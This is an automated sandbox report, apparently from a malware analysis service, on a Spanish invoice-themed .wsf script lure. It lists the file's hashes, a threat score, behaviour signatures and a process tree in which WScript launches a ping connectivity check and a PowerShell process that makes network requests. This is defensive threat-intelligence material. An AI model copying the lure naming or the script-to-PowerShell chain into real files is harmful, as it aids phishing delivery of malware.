Analysis

  • max time kernel
    146s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    15-10-2024 08:08

General

  • Target
    Recordatorio de orden de compra - factura numero 2024-10.wsf
  • Size
    8KB
  • MD5
    abe356554178ad255021d0334f8950b5
  • SHA1
    2ab70f593dde24a0bb0b6ad7258069b1735d3889
  • SHA256
    554a5dbed0ecc5f4cceab8042d8d3d2d9587f43507e0150bb3df9f01b4de88d6
  • SHA512
    8d7179a5adbdb097c7d029793b4c72115a0fcace5298e306d5ae6a46107dd3be2f689d385672b4452588a0f3823ac02a2caf2221499791eeff4e3b4280647de3
  • SSDEEP
    192:FF6VUXhzSkGC0aiYrfOFpXyig0rmDMfIwagGgFFAV+:eIjDtOZZfVagbFFAV+

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request (64 IoCs)
  • Enumerates physical storage devices (1 TTPs)
    Attempts to interact with connected storage/optical drive(s).
  • System Network Configuration Discovery: Internet Connection Discovery (1 TTPs, 2 IoCs)
    Adversaries may check for Internet connectivity on compromised systems.
  • System Time Discovery (1 TTPs, 1 IoCs)
    Adversary may gather the system time and/or time zone settings from a local or remote system.
  • Runs ping.exe (1 TTPs, 1 IoCs)
  • Suspicious behavior: EnumeratesProcesses (1 IoCs)
  • Suspicious use of AdjustPrivilegeToken (1 IoCs)
  • Suspicious use of WriteProcessMemory (9 IoCs)

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Recordatorio de orden de compra - factura numero 2024-10.wsf"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2684
    • C:\Windows\System32\cmd.exe
      cmd.exe /c ping aszzzw_6777.6777.6777.677e
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:2792
      • C:\Windows\system32\PING.EXE
        ping aszzzw_6777.6777.6777.677e
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2940
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      2⤵
      • Blocklisted process makes network request
      • System Time Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2444

Network

MITRE ATT&CK Enterprise v15

Downloads

  • memory/2444-4-0x000007FEF664E000-0x000007FEF664F000-memory.dmp (4KB)
  • memory/2444-5-0x000000001B670000-0x000000001B952000-memory.dmp (2.9MB)
  • memory/2444-6-0x0000000002770000-0x0000000002778000-memory.dmp (32KB)
  • memory/2444-7-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp (9.6MB)
  • memory/2444-8-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp (9.6MB)
  • memory/2444-11-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp (9.6MB)
  • memory/2444-10-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp (9.6MB)
  • memory/2444-9-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp (9.6MB)
  • memory/2444-12-0x000007FEF664E000-0x000007FEF664F000-memory.dmp (4KB)
  • memory/2444-13-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp (9.6MB)
  • memory/2444-14-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp (9.6MB)